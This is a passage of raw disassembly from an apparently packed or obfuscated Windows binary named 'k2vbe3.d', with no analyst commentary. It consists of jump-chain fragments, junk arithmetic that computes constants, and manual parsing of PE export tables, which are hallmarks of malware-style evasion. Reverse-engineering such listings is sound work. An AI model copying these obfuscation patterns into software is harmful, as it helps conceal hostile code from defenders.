		pop	ecx
		rol	ecx, 4
		and	ecx, 7F83BAEFh
		sub	ecx, 320A8755h
		test	ecx, 100h
		jmp	loc_4548A1
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_444F6B:				; CODE XREF: k2vbe3.d:0045986Fj
		jl	nullsub_277
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_444F71:				; CODE XREF: sub_45A323:loc_44106Cj
		or	edx, 0C3268F81h
		add	edx, 43EB1CD1h
		call	sub_45B20A
		push	offset sub_441E59
		jmp	nullsub_387
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457E9C

loc_444F8C:				; CODE XREF: sub_457E9C+2DC4j
		add	ebx, 0C7798CC9h
		mov	ebx, [ebx]
		xchg	ebx, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_457E9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_444F98:				; CODE XREF: sub_45BE94:loc_445513j
		mov	edx, edi
		jmp	loc_458D40
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_444F9F:				; CODE XREF: sub_448A7D+720Ej
		jnz	loc_453031
		push	ecx
		or	edx, 1F2CD049h
		jmp	loc_453030
; END OF FUNCTION CHUNK	FOR sub_448A7D

; =============== S U B	R O U T	I N E =======================================



sub_444FB1	proc near		; CODE XREF: sub_448B5E-B79Bj
					; sub_43D8BF:loc_44459Aj ...
		push	esi
		mov	esi, ebp
		call	sub_444EFA

loc_444FB9:				; CODE XREF: sub_448D7F+FAD4j
		jmp	nullsub_36
sub_444FB1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_444FBE:				; CODE XREF: sub_443EF6+4878j
		jmp	loc_4516D2
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------

loc_444FC3:				; CODE XREF: k2vbe3.d:004483E3j
		jmp	loc_44C1A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526F4

loc_444FC8:				; CODE XREF: sub_4526F4-146BDj
		jmp	nullsub_127
; END OF FUNCTION CHUNK	FOR sub_4526F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_444FCD:				; CODE XREF: sub_449372:loc_4491D6j
		pop	ecx
		pop	edx
		pop	ebp
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	edx
		jmp	loc_45B659
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597E6

loc_444FDE:				; CODE XREF: sub_4597E6+Bj
		jnz	loc_4505E4
		jmp	loc_457F8D
; END OF FUNCTION CHUNK	FOR sub_4597E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44249A

loc_444FE9:				; CODE XREF: sub_44249A:loc_4567F5j
		mov	[esi], ecx
		pop	esi
		mov	[ebp+var_6], dx
		push	ecx
		push	666ECD90h
		jmp	loc_44FA22
; END OF FUNCTION CHUNK	FOR sub_44249A

; =============== S U B	R O U T	I N E =======================================



sub_444FFB	proc near		; DATA XREF: k2vbe3.d:00450D58o
		shl	eax, cl
		mov	cl, [ebp-0Bh]
		xor	edx, edx
		mov	dl, [ebp-9]
		call	sub_459F85
sub_444FFB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_44500A:				; CODE XREF: sub_43D31B+17DF8j
		jmp	loc_44BC46
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------

loc_44500F:				; CODE XREF: k2vbe3.d:loc_43D2C3j
		jmp	loc_43F1B4
; ---------------------------------------------------------------------------

loc_445014:				; DATA XREF: sub_442DF0+9DB9o
		jnz	loc_44DF64
		jmp	loc_453573
; ---------------------------------------------------------------------------
		jmp	loc_44DF64

; =============== S U B	R O U T	I N E =======================================



sub_445024	proc near		; CODE XREF: sub_441632+9p
					; k2vbe3.d:loc_441C45j	...
		push	offset dword_45ACE4
		jmp	nullsub_37
sub_445024	endp

; ---------------------------------------------------------------------------
		push	0AADCF0D4h
		adc	edx, esi
		jmp	loc_45958A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44503A:				; CODE XREF: k2vbe3.d:0043D12Cj
					; sub_454AD4-73F7j ...
		jmp	loc_452E99
; ---------------------------------------------------------------------------

loc_44503F:				; CODE XREF: sub_43C865+Aj
					; k2vbe3.d:0044189Bj
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_445042:				; CODE XREF: k2vbe3.d:00440975j
		jmp	loc_45398C

; =============== S U B	R O U T	I N E =======================================



sub_445047	proc near		; CODE XREF: k2vbe3.d:0043CE8Fp
					; k2vbe3.d:0043D282p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00446D98 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004585E3 SIZE 00000005 BYTES

		push	ecx

loc_445048:				; CODE XREF: k2vbe3.d:loc_4511F1j
		mov	ecx, ebp
		jmp	loc_4585E3
sub_445047	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_397. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4532AD

loc_445050:				; CODE XREF: sub_4532AD+5j
		jmp	loc_454BC3
; END OF FUNCTION CHUNK	FOR sub_4532AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_445055:				; CODE XREF: sub_4471DC+990j
		jmp	loc_44F050
; END OF FUNCTION CHUNK	FOR sub_4471DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_44505B:				; CODE XREF: sub_4440E5+Bj
		jmp	loc_443E86
; END OF FUNCTION CHUNK	FOR sub_4440E5

; =============== S U B	R O U T	I N E =======================================



sub_445060	proc near		; DATA XREF: sub_448735+5o
		push	eax
		pop	esi
		xchg	esi, [esp+0]
		push	offset loc_43C6A0
		jmp	nullsub_51
sub_445060	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_44506F:				; CODE XREF: sub_44F028-11792j
					; sub_44F028:loc_43ECACj
		mov	[ebp-2Ch], eax
		mov	dword ptr [ebp-20h], 1

loc_445079:				; CODE XREF: sub_454E69+4E7Aj
		jnz	loc_44BB5A
		mov	eax, [ebp-18h]
		test	dword ptr [eax], 0FFFF0000h
		jnz	loc_4586F2
		jmp	loc_45B426
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_445093:				; CODE XREF: sub_4454EF:loc_43C079j
					; sub_43F2E0-3252j
		add	eax, 0BA6CE6C1h
		add	eax, ebp
		add	eax, 0C054373Ch
		mov	dword ptr [eax], 6C43776Fh
		lea	eax, [ebp-14h]
		mov	dword ptr [eax], 737361h
		jmp	sub_451BBF
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BAE4

loc_4450B5:				; CODE XREF: sub_44BAE4-65B3j
		jl	loc_45B39F

loc_4450BB:				; CODE XREF: sub_454E83+4D36j
		jmp	sub_43E282
; END OF FUNCTION CHUNK	FOR sub_44BAE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_4450C0:				; CODE XREF: sub_4461D5-61FEj
		jmp	sub_4580F0
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------
		ror	edi, 18h
		shr	ecx, 17h
		jmp	loc_45B39F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_4450D0:				; CODE XREF: sub_441172:loc_4573E5j
		push	0C5D94681h
		pop	ecx
		sub	ecx, 0C8EE28Ch
		xor	ecx, 0E759E87Ch
		and	ecx, 285B667Ch
		or	ecx, 6FD86B69h
		add	ecx, 9069CB42h
		xchg	ecx, [esp+0]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_4428D7
		jmp	loc_452127
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_359. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44510A:				; CODE XREF: sub_446E24+8B0Cj
		jmp	loc_45B8F2
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_44510F:				; CODE XREF: k2vbe3.d:0044F8F5j
		jmp	loc_450BE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F92

loc_445114:				; CODE XREF: sub_440F92-17EBj
		jmp	nullsub_537
; END OF FUNCTION CHUNK	FOR sub_440F92
; ---------------------------------------------------------------------------

loc_445119:				; CODE XREF: k2vbe3.d:00450131j
		jz	loc_45AD19
		jmp	loc_44E58B

; =============== S U B	R O U T	I N E =======================================



sub_445124	proc near		; DATA XREF: k2vbe3.d:loc_45B659o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043CC29 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DAB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EB1D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F60F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043FDE9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440E9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044126B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044168B SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00441BA8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00442335 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044233F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00442EE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444ACC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461ED SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044895E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004493D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C3C1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E3EF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E7E0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044E8C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F50B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044FC3B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00450D2E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451683 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004540FD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00454538 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00455056 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456B51 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004576E4 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00458967 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459F8E SIZE 0000000E BYTES

		push	ebx
		push	edi

loc_445126:				; CODE XREF: k2vbe3.d:0044E69Bj
		mov	edi, ecx
		call	sub_449A11

loc_44512D:				; CODE XREF: k2vbe3.d:loc_446970j
		pop	edi
		mov	eax, [ebp-4]
		movzx	eax, word ptr [eax+14h]
		add	eax, [ebp-4]
		jmp	loc_442EE9
sub_445124	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_531. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_44513E:				; CODE XREF: sub_43FF90:loc_443230j
		jmp	loc_440B3E
; END OF FUNCTION CHUNK	FOR sub_43FF90

; =============== S U B	R O U T	I N E =======================================



sub_445143	proc near		; CODE XREF: sub_458DAF:loc_44143Ap
					; k2vbe3.d:00459D40j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045A73B SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		jmp	loc_45A73B
sub_445143	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		rol	edi, 1Eh
		jmp	sub_43D8BF
; ---------------------------------------------------------------------------

loc_445157:				; CODE XREF: k2vbe3.d:0045B79Fj
		sbb	ebx, ebp

; =============== S U B	R O U T	I N E =======================================



sub_445159	proc near		; CODE XREF: k2vbe3.d:004510A1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C95C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440059 SIZE 0000000A BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		push	ebp
		mov	ebp, esp
		push	ebx
		push	eax
		jmp	loc_43C95C
sub_445159	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_445167:				; CODE XREF: sub_44B94B:loc_44C005j
		mov	eax, [ebp-4]
		call	sub_44746F
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jle	loc_45686D
		mov	eax, [ebp-4]
		xor	edx, edx
		jmp	loc_45735A
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		jb	loc_457302
		mov	[ebp+0], ecx
		jmp	sub_43FF90
; ---------------------------------------------------------------------------
		cmp	ecx, 9F188B2Ah
		jmp	loc_446712
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44519F:				; CODE XREF: sub_454E69+65DBj
		jb	loc_44266B

loc_4451A5:				; CODE XREF: sub_454E69:loc_4445AAj
		mov	eax, [ebp-18h]
		mov	eax, [eax]
		shl	eax, 3
		add	eax, [ebp-8]
		jmp	loc_451F3C
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_4451B5:				; CODE XREF: sub_4479A1+BED5j
		rol	edx, 1Ch
		and	edx, 8E7A5649h
		xor	edx, 8E181448h
		xchg	edx, [esp+0]
		push	0
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		jmp	loc_458EBC
; END OF FUNCTION CHUNK	FOR sub_4479A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_318. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_4451D5:				; CODE XREF: sub_45B4EE-1DA91j
		jmp	loc_43D73F
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------

loc_4451DA:				; CODE XREF: k2vbe3.d:00455EB4j
		jle	loc_446CAF
		popf
		sbb	edi, 0B9A75046h
		jmp	loc_449685
; ---------------------------------------------------------------------------

loc_4451EC:				; CODE XREF: k2vbe3.d:0044E7C2j
		xor	ebx, 213BBE25h
		jmp	loc_44B2CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_4451F7:				; CODE XREF: sub_4580DF:loc_44DAB4j
					; k2vbe3.d:0044DAC8j
		add	edi, 8CF69734h
		push	offset loc_4454E1
		jmp	nullsub_265
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_445207:				; CODE XREF: sub_456541:loc_454634j
		jnz	loc_454AF7

loc_44520D:				; CODE XREF: k2vbe3.d:0045152Ej
		mov	eax, [ebp+8]
		push	eax
		cmp	dword ptr [ebp-14h], 5
		setz	al
		call	sub_456A5F
		jmp	loc_43F13D
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------

loc_445222:				; CODE XREF: k2vbe3.d:0043D15Fj
		not	ebp
		jnp	loc_4486FD
		shr	eax, 0Ah
		adc	esi, edi
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_44522F:				; CODE XREF: sub_443BDF:loc_43D14Ej
		sub	eax, 0C1D8F1D9h
		jmp	loc_452175
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45687E

loc_44523A:				; CODE XREF: sub_45687E:loc_4597A9j
		xchg	esi, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_45687E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44523E:				; CODE XREF: sub_4529E2-3593j
		jmp	loc_44EFF6
; END OF FUNCTION CHUNK	FOR sub_4529E2

; =============== S U B	R O U T	I N E =======================================



sub_445243	proc near		; CODE XREF: k2vbe3.d:004538EAp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044C80A SIZE 0000000A BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		mov	eax, ebp
		jmp	loc_44C80A
sub_445243	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_445250:				; CODE XREF: k2vbe3.d:004415ABj
		mov	eax, 3FFC3041h
		push	eax
		push	58C8BD6Fh
		pop	eax
		rol	eax, 11h
		jmp	loc_440063
; ---------------------------------------------------------------------------

loc_445264:				; CODE XREF: k2vbe3.d:00449BBEj
		pop	edx
		pop	ecx
		xchg	eax, [esp]
		mov	edx, eax
		xchg	edx, [esp]
		mov	eax, edx
		pop	edx
		pop	ebp
		jmp	loc_449C64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F6B

loc_445277:				; CODE XREF: sub_455F6B:loc_4402C1j
		add	edi, 0E56C5798h
		mov	[edi], eax
		xchg	esi, [esp+8+var_8]
		mov	edi, esi
		pop	esi
		push	offset loc_456A95
		jmp	loc_45A331
; END OF FUNCTION CHUNK	FOR sub_455F6B
; ---------------------------------------------------------------------------
		sub	ebp, 0E18B2F3Bh
		jmp	loc_458D75

; =============== S U B	R O U T	I N E =======================================



sub_44529A	proc near		; CODE XREF: k2vbe3.d:0044733Aj
					; sub_443BDF+7F15p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004463E3 SIZE 00000011 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	esp, ebp
		xchg	edx, [esp-4+arg_0]
		mov	ebp, edx
		jmp	loc_4463E3
sub_44529A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4452AA:				; CODE XREF: k2vbe3.d:loc_447833j
		call	sub_449006

loc_4452AF:				; CODE XREF: k2vbe3.d:004542DCj
		pop	edi
		adc	eax, ecx

loc_4452B2:				; CODE XREF: k2vbe3.d:loc_457211j
		push	0
		push	edi
		push	0A4AC1EA9h
		pop	edi
		and	edi, 0E754431Ah
		jmp	loc_45B29A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F7F

loc_4452C6:				; CODE XREF: sub_451F7F+Dj
		rol	ecx, 10h
		and	ecx, 226747DCh
		rol	ecx, 19h
		add	ecx, 0F843BAB0h
		xchg	ecx, [esp+4+var_4]
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_451F7F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4475D5

loc_4452E1:				; CODE XREF: sub_4475D5:loc_44A133j
		push	0A7D1B8A9h
		pop	esi
		rol	esi, 1
		sub	esi, 0FF401336h

loc_4452EF:				; CODE XREF: sub_443FC1:loc_45BBE3j
		or	esi, 191C8AA8h
		add	esi, 0A6C4706Fh
		mov	[esi], eax
		xchg	edi, [esp+0]
		jmp	loc_457F0F
; END OF FUNCTION CHUNK	FOR sub_4475D5
; ---------------------------------------------------------------------------

locret_445305:				; CODE XREF: k2vbe3.d:0043DE83j
		retn
; ---------------------------------------------------------------------------

loc_445306:				; CODE XREF: k2vbe3.d:0044F4FBj
		jmp	sub_4597AE
; ---------------------------------------------------------------------------

loc_44530B:				; CODE XREF: k2vbe3.d:00448EDEj
		jge	loc_44003F
; START	OF FUNCTION CHUNK FOR sub_4573B7

loc_445311:				; CODE XREF: sub_4573B7+9j
		jmp	loc_45A3E9
; END OF FUNCTION CHUNK	FOR sub_4573B7
; ---------------------------------------------------------------------------
		xor	edx, ebp
		jmp	loc_44003D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBC0

loc_44531D:				; CODE XREF: sub_43EBC0+Dj
		pop	eax
		xor	eax, eax

locret_445320:				; CODE XREF: k2vbe3.d:00459DF0j
		retn
; END OF FUNCTION CHUNK	FOR sub_43EBC0

; =============== S U B	R O U T	I N E =======================================



sub_445321	proc near		; DATA XREF: sub_44881E:loc_43EC20o
					; sub_444EFA+3F7Bo
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, 150h
		call	sub_44ADEC
		jmp	loc_44493F
sub_445321	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44533A	proc near		; CODE XREF: k2vbe3.d:0043EB7Dj
					; sub_45B4A2-19810p

var_4		= dword	ptr -4

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, dword_44BA88
		push	eax
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		jmp	loc_44F27D
sub_44533A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_445350:				; CODE XREF: sub_44C90E-12B2j
		push	0
		push	10h
		push	0A4CDF8FCh
		pop	eax

loc_44535A:				; CODE XREF: k2vbe3.d:loc_4598B4j
		rol	eax, 8
		jmp	loc_449C30
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A252

loc_445362:				; CODE XREF: sub_45A252+17j
		jnz	loc_44B283
		jmp	loc_446C97
; END OF FUNCTION CHUNK	FOR sub_45A252
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_509. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A980

loc_44536E:				; CODE XREF: sub_44A980+Dj
		jmp	loc_44C2AF
; END OF FUNCTION CHUNK	FOR sub_44A980

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_445373	proc near		; DATA XREF: sub_459DAF+Eo
		jmp	loc_43ED71
sub_445373	endp

; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-8], 1
		jmp	loc_4473D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_445384:				; CODE XREF: sub_44A0D7-CB0Cj
					; sub_4553CC-16494j ...
		mov	eax, [ebp-10h]
		push	eax
		push	ebx
		push	7623B2FBh
		pop	ebx
		or	ebx, 0D695BA96h
		jmp	loc_45C180
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_319. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44539B:				; CODE XREF: k2vbe3.d:0043C612j
		jmp	loc_44476C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_4453A0:				; CODE XREF: sub_44DD31+Dj
		xor	eax, 2409F222h
		push	ecx
		push	3EEBC014h
		pop	ecx
		rol	ecx, 18h
		add	ecx, 0E88C1893h
		cmp	ecx, 0E8B80772h
		jmp	loc_45205A
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------

loc_4453C1:				; CODE XREF: k2vbe3.d:loc_454CA7j
		sub	ecx, 0E866450Dh
		and	ecx, 0FC463548h
		add	ecx, 711A32C9h
		jnz	loc_43FAC8
		mov	ebp, esi
		jmp	sub_4503D6
; ---------------------------------------------------------------------------
		jle	loc_457C7F
		push	edx
		jmp	sub_4402E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45574A

loc_4453EC:				; CODE XREF: sub_45574A:loc_4407E9j
		sub	ecx, 0FF4716ABh
; END OF FUNCTION CHUNK	FOR sub_45574A
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_4453F2:				; CODE XREF: sub_4426DF:loc_44AA1Aj
		xor	ecx, 0F5FB5AF2h
		add	ecx, ebp
		add	ecx, 0B3C56E1h
		mov	[ecx], eax
		pop	ecx
		jmp	loc_450E5A
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44367E

loc_445408:				; CODE XREF: sub_44367E:loc_443684j
		call	sub_45B74D

loc_44540D:				; CODE XREF: sub_45B454:loc_44B106j
					; sub_44128B+10BF2j
		push	0AE47380Dh
		pop	eax
		or	eax, 0DB9434E1h
		jmp	loc_44C242
; END OF FUNCTION CHUNK	FOR sub_44367E
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_44D887
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_445424:				; CODE XREF: sub_44866A:loc_44C1DFj
					; sub_44866A+3B83j ...
		jno	loc_4435FC
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_44086E
		jmp	loc_44121E
; END OF FUNCTION CHUNK	FOR sub_44866A

; =============== S U B	R O U T	I N E =======================================



sub_44543E	proc near		; DATA XREF: sub_458046+Co
		push	edi
		push	0F205C554h
		pop	edi
		and	edi, 7C442397h
		xor	edi, 4D372D30h
		jmp	loc_450C4E
sub_44543E	endp

; ---------------------------------------------------------------------------

loc_445456:				; CODE XREF: k2vbe3.d:0043C291j
		jl	loc_45A41C
		rol	esi, 0Eh
		ror	edx, 1Dh
		jmp	loc_45A416
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_445467:				; CODE XREF: sub_43D0A9+5551j
		mov	eax, [esp-4+arg_0]
		push	edx
		nop
		mov	eax, 2867838Ah
		jmp	loc_448B18
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_445476:				; CODE XREF: sub_440EE3:loc_43DD77j
		jnz	loc_44C33C

loc_44547C:				; CODE XREF: sub_459382+Cj
		jmp	nullsub_259
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_445481:				; CODE XREF: sub_442475+C304j
		jmp	loc_458DC6
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1FD

loc_445486:				; CODE XREF: sub_44A1FD+Bj
		jmp	nullsub_57
; END OF FUNCTION CHUNK	FOR sub_44A1FD
; ---------------------------------------------------------------------------
		shr	eax, 0Ch
		jmp	loc_44C331
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 0Bh
		mov	ds:dword_445618, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_44549E:				; CODE XREF: k2vbe3.d:004464A4j
					; sub_44E481+7j
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jno	loc_450225
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_447B18
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
		not	ebp
		xor	edx, 0CFF3693Dh
		jmp	sub_43FECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_4454C4:				; CODE XREF: sub_44DD31+D156j
		cdq
		xor	ebx, 0FB3CD40Fh
; END OF FUNCTION CHUNK	FOR sub_44DD31
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4454CB:				; CODE XREF: sub_44C90E:loc_458E1Dj
		push	0
		push	edx
		jmp	loc_43D806
; END OF FUNCTION CHUNK	FOR sub_44C90E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_376. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E647

loc_4454D4:				; CODE XREF: sub_44E647+7C79j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_44E647
; ---------------------------------------------------------------------------

loc_4454D9:				; DATA XREF: sub_4471DC+E778o
		xchg	ecx, [esp]
		jmp	loc_44E6DC
; ---------------------------------------------------------------------------

loc_4454E1:				; DATA XREF: sub_4580DF-12EE2o
		xchg	edi, [esp]
		jmp	loc_449800
; ---------------------------------------------------------------------------

loc_4454E9:				; CODE XREF: k2vbe3.d:00450BA2j
		jb	loc_43FF86

; =============== S U B	R O U T	I N E =======================================



sub_4454EF	proc near		; CODE XREF: sub_444297+10F9Fp

; FUNCTION CHUNK AT 0043C079 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043D54B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E05D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004404E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C6A SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
